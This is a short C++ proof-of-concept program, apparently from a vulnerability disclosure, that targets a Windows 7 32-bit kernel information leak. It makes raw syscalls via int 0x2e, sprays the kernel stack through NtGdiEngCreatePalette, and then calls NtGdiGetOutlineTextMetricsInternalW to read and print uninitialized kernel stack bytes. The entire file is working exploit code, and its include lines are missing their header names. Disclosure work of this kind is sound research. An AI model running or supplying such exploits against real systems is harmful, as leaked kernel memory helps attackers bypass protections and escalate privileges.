#include #include // For native 32-bit execution. extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { __asm{mov eax, ApiNumber}; __asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; } // Own implementation of memset(), which guarantees no data is spilled on the local stack. VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { for (ULONG i = 0; i < size; i++) { ptr[i] = byte; } } VOID SprayKernelStack() { // Windows 7 32-bit. CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c; // Buffer allocated in static program memory, hence doesn't touch the local stack. static BYTE buffer[1024]; // Fill the buffer with 'A's and spray the kernel stack. MyMemset(buffer, 'A', sizeof(buffer)); SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0); // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. MyMemset(buffer, 'B', sizeof(buffer)); } int main() { // Windows 7 32-bit. CONST ULONG __NR_NtGdiGetOutlineTextMetricsInternalW = 0x10c6; // Create a Device Context. HDC hdc = CreateCompatibleDC(NULL); // Create a TrueType font. HFONT hfont = CreateFont(10, // nHeight 10, // nWidth 0, // nEscapement 0, // nOrientation FW_DONTCARE, // fnWeight FALSE, // fdwItalic FALSE, // fdwUnderline FALSE, // fdwStrikeOut ANSI_CHARSET, // fdwCharSet OUT_DEFAULT_PRECIS, // fdwOutputPrecision CLIP_DEFAULT_PRECIS, // fdwClipPrecision DEFAULT_QUALITY, // fdwQuality FF_DONTCARE, // fdwPitchAndFamily L"Times New Roman"); // Select the font into the DC. SelectObject(hdc, hfont); // Spray the kernel stack to get visible results. SprayKernelStack(); // Read the 4 uninitialized kernel stack bytes and print them on screen. DWORD output[2] = { /* zero padding */ }; if (!SystemCall32(__NR_NtGdiGetOutlineTextMetricsInternalW, hdc, 0, NULL, output)) { printf("NtGdiGetOutlineTextMetricsInternalW failed\n"); DeleteObject(hfont); DeleteDC(hdc); return 1; } printf("Data read: %x\n", output[1]); // Free resources. DeleteObject(hfont); DeleteDC(hdc); return 0; }